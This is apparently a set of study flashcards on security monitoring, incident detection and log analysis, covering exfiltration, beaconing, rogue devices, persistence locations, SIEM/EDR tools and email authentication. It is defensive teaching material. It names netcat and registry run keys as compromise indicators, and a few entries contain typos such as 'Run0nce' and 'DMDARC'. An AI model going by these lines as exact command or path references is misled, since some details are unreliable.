D1 Ch3 Flashcards
Difference between an event and an incident
Event - an observable event like a file download
Incident - actions that may cause harm, like sec policy violation, unauthorized use/access, DoS, etc
A notification caused by an event is called
Alert
3 common types of monitoring
Router-based monitoring
Active monitoring
Passive monitoring
A type of monitoring that provides information about the flow of traffic and about network devices. It only captures about every 1/1000 or 1/100 packets for analysis.
Carried out by the network devices themselves (routers, switches)
Router-based monitoring
sFlow, NetFlow, and J-Flow are all types of what?
Flow capture technologies
Information about traffic that is passing through a router/switch is called
Network flow
SNMP is used for what type of monitoring?
Router-based
A type of monitoring that gathers information about availability, routes, packet delay/loss, and bandwidth.
Carried out by a monitoring device reaching out to other devices.
Active monitoring
Which two types of monitoring ADD traffic to a network?
Router-based
Active
A type of monitoring that is carried out as traffic passes a location on a net link
This method uses after-the-fact analysis
Passive monitoring
Which type of monitoring does NOT add traffic to a network?
Passive
4 methods used to detect bandwidth consumption
Tools that use flow data can show trend and status info indicating that network bandwidth utilization has peaked
Monitoring tools can be used to check for high usage levels and can send alarms based on thresholds
Real-time or near-real-time graphs can be used to monitor bandwidth as usage occurs
SNMP data can be used to monitor for high load and other signs of bandwidth utilization at the router or network device level
Methods of detecting data exfiltration (3)
Anomaly detection
Behavioral analysis
DLP systems/software
True/False
It’s easier to detect and stop data exfiltration while it is happening rather than to prevent it
False
It is easier to prevent than to detect and stop it while it occurs.
2 difficulties of detecting data exfiltration
Encryption is a common practice
Large volumes of traffic occur in large orgs
Data exfiltration red flags (2)
Internal servers reaching out to external systems
Large data transfers from sensitive file stores
Traffic sent from a zombie to it’s C2 server to request commands, provide status, or download additional malware is called
Beaconing
3 methods of detecting beaconing
IDS/IPS that identifies known botnet controllers or botnet behavior
Flow analysis tools
Traffic monitoring tools
2 reasons why detecting beaconing can be difficult
Encryption
High traffic volume
3 methods of detecting unexpected traffic
IDS/IPS behavior-based detection
Traffic monitoring systems
Manual observation
Common examples of unexpected traffic (6 - don’t need to memorize them, but broadly know them)
Scans
Sweeps
Spikes in traffic
Activity on unexpected ports
P2P traffic between systems that don’t normally communicate
Direct attack traffic
Understanding what is expected/unexpected traffic relies on 3 major techniques
List them and describe how they are used.
Baselines
monitoring systems alarm when baselines are exceeded by a given threshold or when behaviors deviate from baseline behaviors
Heuristics
Uses network security device-defined rules for scans, sweeps, attack traffic, etc.
Protocol analysis
Can find VPN traffic where no VPN traffic is expected, IPv6 tunnels in an IPv4 network, detect common protocols sent over an uncommon port, etc.
When a common protocol is used over an uncommon port, what can this mean? (2)
An attacker set up an alternate service port
A scan/sweep is underway
1 method of detecting a scan/sweep
IDS/IPS/firewalls that have built-in scan detection capabilities
Scan/sweep red flags (3)
Sequential testing of service ports
Connecting to many IP addresses
Repeated requests to services that may not be active
True/false
When you have detecting a scan/sweep, you should immediately block the IP that is doing it
False
You should place the info/logs into a SIEM for analysis, and DO NOT respond directly
A type of scan that is more difficult to detect by automated means (IPS/IDS/firewall)
Stealth scan
3 patterns of DoS attacks
Attempts to overwhelm a network/service via a large volume of requests
Attacks on a service/system vulnerability to cause a failure
Attacks on an intermediary system/network to prevent traffic between two locations
What is one thing to keep in mind when trying to detect DoS attacks?
All 3 patterns of attack require different methods of detection
2 methods of stopping a DoS attack
Firewall or other device can block that system
IPS can block attack traffic
4 methods of detecting DoS and DDoS attacks
Performance monitoring tools using service performance monitoring tools
Connection monitoring using local system or application logs
Network bandwidth or system bandwidth monitoring
Dedicated tools like IDSs or IPSs with DDoS and DDoS detection rules enabled
5 methods of detecting “other” network attacks
Using an IDS/IPS
Monitoring flows, SNMP, and other network information for suspect behaviors
Feeding logs from firewalls, routers, switches, and other network devices to a central log analysis and monitoring system
Using a SIEM device to review and automatically alarm them about problem traffic
Deploying host-level tools like EDR that monitor network behavior at the endpoint level
Devices that are connecting to a network when they should not be are called
Rogue devices
6 methods of detecting rogue devices
Valid MAC address checking (checks MAC address against a list of known devices)
MAC address vendor information checking (identifies devices based on their manufacturer via a vendor prefix on the MAC address)
Network scanning (performed using a tool like nmap to identify new devices)
Site surveys (physically reviewing each device by manual verification or checking wireless networks on-site)
Traffic analysis (identifies irregular/unexpected traffic)
(wireless rogue detection)
Port scan with OS identification turned on (if a port scanner can’t easily identify the device, that is a red flag)
Wired rogues rely on what kind of networks to connect?
Open/unauthenticated
A security feature that checks for trusted MAC addresses
Port security
2 methods of preventing wired rogue devices
Port security
NAC
Which 4 system resources should be monitored continuously?
Processor (CPU)
Memory
Drive capacity
Filesystem changes and anomalies
Spikes in processor consumption in a system with otherwise consistent usage levels can indicate what?
New software or a process that was not previously active
Consistently high processor consumption can indicate what?
DoS condition
True/False
When monitoring memory consumption, you should be more focused on the amount of usage rather than the content of the memory
True
Microsoft centralized monitoring/management for drive capacity consumption
SCOM (System Center Operations Manager)
Linux drive capacity consumption and monitoring software
Nagios
Windows resource monitor allows visibility into the CPU, memory, disk, and network utilization for a system.
It is called…
resmon
Windows performance monitor provides much more detailed data with counters ranging from energy usage to disk and network activity. It also supports collection from remote systems.
It is called…
perfmon
When talking about Windows monitoring software, ____ is useful for detailed data collection, whereas ____ is useful for checking basic usage measures quickly.
Perfmon; resmon
A suite for Windows that provides extensive monitoring capabilities beyond the built-in set of tools (resmon and perfmon)
Sysinternals suite
Linux command that provides a snapshot view of CPU and memory usage, the time a process started, how long it’s been running, and the command that started each process
ps
Linux command that provides a continuous view of data similar to ps. It also provides interactions via hotkeys - for example, press A to see top consumers.
top
Linux command that displays a report of the system’s disk usage, with various flags providing additional detail or formatting
df
Linux command that indicates which accounts are logged in
w
Detecting malware relies on 5 major methods:
Central management tools (manage software installation and report on installed software)
Antivirus/antimalware tools
EDR (detects and responds)
Software and file block listing
Application allow listing
True/False
Just like perfmon and resmon, Endpoint Manager monitors in real time
False
It does not monitor in real time
A common Linux command-line utility that allows you to create UDP/TCP connections using simple commands - commonly associated with penetration testing and compromises.
Its presence may indicate that your system is compromised (if you hadn’t downloaded it onto the system previously)
netcat
Abnormal OS behavior can be indicative of what kind of malware?
Rootkit
The unauthorized removal of data from systems/datastores
Data exfiltration
A type of attack that injects malicious libraries into processes in order to evade process-based defenses and elevate privileges.
DLL injection
3 methods used to conceal data exfiltration
Encryption
Send data thru commonly used channels (HTTP)
Sending thru covert channels like DNS requests or other services
A type of attack that encodes C2 messages or small amounts of data into inconspicuous DNS responses and queries
DNS tunnelling
5 methods of detecting and responding to data exfiltration
EDR
IPS
DLP
Data tagging
Data protection
The process of assigning a metadata label to a piece of data in the form of key value pairs - for example, date created, department, author, file format, etc.
This enables you to more easily categorize, identify, search, manage, and protect the data.
Data tagging
Unauthorized access detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
Authentication
User creation
Location of data:
Authentication logs
User creation logs
Analysis tools
Central management suite
SIM/SIEM
Difference between SIM and SIEM
SIM (Security Information Management) focuses on log management and analysis. Allows administrators to run security reports, graphs, and charts in real time.
SIEM (Security Information and Event Management) combines both information management and event management. It allows administrators to look for malicious patterns or to monitor resource capacity management.
Unauthorized changes detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
File creation
Settings changes
Location of data:
System logs
Application logs
Monitoring tools
Analysis tools:
Central management suite
SIM/SIEM
File and directory integrity checking tools (Tripwire)
Unauthorized privilege use detection mechanisms:
Data logged
Location of data
Analysis tools
Data logged:
Privilege use attempts
Privilege escalation
Location of data:
Security event logs
Application logs
Analysis tools:
SIM/SIEM
Log analysis tools
A Sysinternals feature that validates the access that a specific user/group has to objects (for privilege management)
AccessChk
2 common persistence techniques used in Windows Registry
Using run keys to make programs run when a computer logs in or starts the computer
Using the Windows Startup folder to run a program when the computer starts up
Where is the registry run keys for the following root keys? (2 each)
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run0nce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run0nce
2 methods to protect the Registry for infrequently-changed systems (like servers)
Application allow lists
Lockdown tools if you can’t use Registry monitoring tools
When protecting the Registry for a frequently-changed computer (like an endpoint), what is something to keep in mind?
Use an agent-based Registry monitoring tool to prevent false positives - changes are expected and happen many times per day with endpoints, so you don’t want to be bogged down with unnecessary alerts.
Scheduled tasks in Linux is called
cron jobs
Scheduled tasks (or cron jobs) are used by attackers to ____
Maintain persistence
3 methods to check scheduled tasks in Windows (one is specific to Windows 11)
Windows 10:
Start > Windows Administrative Tools > Task Scheduler
Windows 11:
Start > Windows Tools > Task Scheduler
Any Windows:
schtasks command (may pipe to more command)
3 methods to access cron in Linux
cat /etc/crontab
Or you can check “/etc/cron”
Or you can list the jobs with “crontab -l” (that is a lowercase L)
(optionally use the “-u root” flag to see commands run as root/equivalent users)
Attacker’s method of exploiting the human element of security - used to gather information from targeted individuals
Social engineering
3 methods of social engineering detection
Awareness training
Timely reporting process that encourage staff to report social engineering without punishment
Analysis and response capabilities to determine impact and scope of impact upon success
A URL that is modified to hide the real location of a website - for example, a link looks legitimate at first, but when you hover over it, it shows an IP address rather than the expected website.
Obfuscated link
When investigating service- and application-related issues, what 3 areas of information are required?
Information about what services and apps are running
How they’re expected to behave
Self-reported and system-reported information about them
IoCs of a compromised service (4)
Incorrect behavior
Unexpected logs/errors
New users/processes
File changes
4 common app/service monitoring areas
Up/down (is the service running?)
Performance (does it respond quickly and as expected?)
Transactional logging (information about the function of the service - such as what actions users take or what actions are performed)
Application/service logging (log about the function or status of the service)
The common location for Linux application logs
/var/log
True/False
It is best practice to centralize log collection and analysis, especially since application logs can either go to a logging infrastructure or an app-specific directory/file
True
3 common methods to monitor new account creation (in a large organization)
Privileged account monitoring
Bulk account creation monitoring
Atypical time/location account creation monitoring
3 types of non-security related problems with applications/services
Application/service-specific errors, including authentication errors, service dependency issues, and permissions issues
Applications/services that don’t start on boot, either because of a specific error or because the service is disabled
Service failures, often caused by updates, patches, or other changes
Service/app troubleshooting steps (2)
Start/restart app/service
Check logs
App/service security protection (5)
Service monitoring tools
Log monitoring tools
Antimalware/antivirus/EDR
File integrity checking tools
Allow list tools
3 methods to check statuses of services on Windows
services.msc (Services administrative tool)
sc (command-line tool - Service Controller application that allows you to start, specify error levels, and provide details abt services)
PowerShell “Start-Service” cmdlet
2 methods to check status of services on Linux (and when to use each)
For most services:
service –status-all
For systems that use init.d:
/etc/init.d/servicename status
How do you view the Windows Application log? (2)
via Windows Event Viewer
Or you can centralize these logs using SCOM
Understanding typical app behavior requires 3 things:
Documentation of the app’s normal behavior (including what systems it should connect to, how those connections should be made)
Logging to provide a view of normal ops
Heuristic analysis using antimalware tools to flag when behaviors deviate from the norm
Difference between organizational and localized impact when it comes to a security incident
Organizational
How it affects the company as a whole, including operations, reputation, finances, and potentially even its legal standing
Localized
How it impacts a specific system, department, or user
Difference between immediate and total impact when it comes to a security incident
Immediate impact:
What is the problem right now, as the incident is happening?
Total impact:
Does this attack stand as a sign of a larger compromise or broad-scale attack? Is this part of a trend?
Windows logs that include Application, Security, Setup, and System event logs.
Windows Event Viewer (event logs)
Event Viewer can also be used to analyze what domain software’s logs?
Active Directory
Linux logs that provide information about the state of the system, events, and other details including application-specific logs.
Syslog (usually in the /var/log directory)
When reading syslogs in Linux, what type of events should you make sure to check?
sudo events
Logs that are captured by security devices about security events, system events, and other details useful to security analysts
Security device logs
Logs that capture the source/destination IP addresses of packets, the port and protocol, and what action was taken on traffic
Firewall logs
Logs captured by devices that aim to filter out attacks against web applications - often include alerts when attacks match the OWASP Top 10 or other common app security risks
WAF logs
Logs that capture the source/destination IP addresses, the source and destination ports, the requested resource, the date and time, and the content type and HTTP referrer as well as details about the content, such as the amount of traffic sent.
Proxy logs
When analyzing proxy logs, look for 4 things:
Target host IP, hostname, and what was requested
The amt of content requested (this may help indicate a compromise or match a known malicious package)
The HTTP request method
Unusual user agents and protocol versions, which may be useful for identifying applications, malware, or other targets
A command that specifies the action a client wants to perform on a server resource, essentially telling the server what to do with the requested data, such as retrieving information (GET), creating new data (POST), updating existing data (PUT), or deleting data (DELETE)
HTTP request method
Logs that capture information about traffic that failed a rule. These logs usually contain a lot of information about what is occurring at the application level - for example, you can search for rule hits that included a specific channel name or a nickname.
IDS/IPS logs
A centralized logging, data gathering, reporting, and analysis tool used to identify potential security issues.
Due to leveraging rules and filtering capabilities to perform analysis, this helps orgs deal with the massive volume of sec information generated by modern infrastructure.
SIEM
SIEM stands for
Security Information and Event Management
Tools that are deployed to endpoint systems, using agents to monitor for and detect potential security issues, attacks, and compromises.
The agents report to a central console or system, providing visibility and management capabilities.
This tool focuses on using threat patterns and IoCs as well as behavioral analysis. It can also respond automatically, either neutralizing the threat, containing it, or alerting security admins.
May also include forensic analysis and incident response tools
EDR
EDR stands for
Endpoint Detection and Response
Tools used to integrate security tools and systems using APIs or other integration methods. This allows admins to gather data from firewalls, vulnerability scanners, IDS/IPS, and more.
The data, alerting, and reporting centralization it provides then drives security automation tasks – triggering responses, correlation and alerting across disparate systems, and feeding analytics capabilities.
SOAR
SOAR stands for
Security Orchestration, Automation, and Response
What is a key element of SOAR tools?
Playbooks
Automated sets of actions that are used when specific sets of events or triggers occur
Playbooks
Tools that allow you to see traffic sent across network connections.
Packet capture tools
A graphical packet capture and inspection tool that is available for Linux, Windows, and Mac OS.
Wireshark
A command-line packet capture tool commonly available on Linux, but also available for other OSs. In fact, this one is built into many Linux distributions.
Tcpdump
If you are trying to analyze potentially-malicious traffic using a packet capture tool, but the traffic is encrypted, what can you do? (Besides unencrypting the traffic)
Rely on behavior-based analysis: look at traffic patterns indicative of malware (known-bad sites, sending unexpected traffic on common ports, other abnormal behaviors)
A command that can be run in a command line in Linux by default, but must be added to Windows machines
Whois
A CLI command that will attempt to resolve the IP address or domain and provide information about it, including registration and contact information.
Also includes information like registrant name, organization, and address; admin name, organization, and address; etc.
Whois
A public, free database of IP addresses that are known to have been used for malicious activities.
AbuseIPDB
A common technique used by security administrators that gives them the ability to see common attack, exploit, and compromise patterns and to identify them for what they are.
Also used by AI or ML systems that look for known patterns associated with compromise or malicious activity.
Pattern recognition
Common C2 communication patterns: (7 - YOU MUST KNOW THESE)
Traffic to known-malicious IP addresses/networks
Traffic on unexpected ports
Traffic via protocols that are not typically in use, or outside the scope of normal traffic via that protocol
Large data transfers
Traffic associated w/ processes that typically would not send traffic like notepad.exe on a Windows system
Traffic sent at times of the day that are not normal
Other unexpected behaviors that don’t match typical use patterns
Email metadata that contains things like SPF, DMDARC, DKIM, and other information.
Email header
A link that is directly integrated within a piece of content, like text on a webpage, an image, or a video, so that when clicked, it takes the user to a different webpage without needing to leave the current page, essentially displaying the linked content directly within the current view; this is often used for embedding videos, images, or interactive elements from other websites.
This link may display something different than the actual domain that it is routing to.
Embedded link
A section at the end of an email that includes a person’s contact information, job title, and sometimes a signature.
Email signature block
True/False
The images and embedded links in email signature blocks can contain other dangerous elements
True
A technology that signs both the body of the email and the elements of the header, helping ensure that the message is actually from the org it claims to be from.
The signature can be checked against a public key that is stored in public DNS entries.
DKIM
An email authentication technique that allows orgs to publish a list of their authorized email servers. These records are added to the DNS information for your domain, and they specify which systems are allowed to send email from that domain.
Systems not listed in these records will be rejected.
SPF
A protocol that uses SPF and DKIM to determine whether an email is authentic. Its records are published in DNS, like DKIM, but it is used to determine whether you should accept a message from a sender, reject it, or quarantine it.
DMARC
DKIM stands for
DomainKeys Identified Mail
SPF stands for
Sender Policy Framework
DMARC stands for
Domain-Based Message Authentication, Reporting, and Conformance
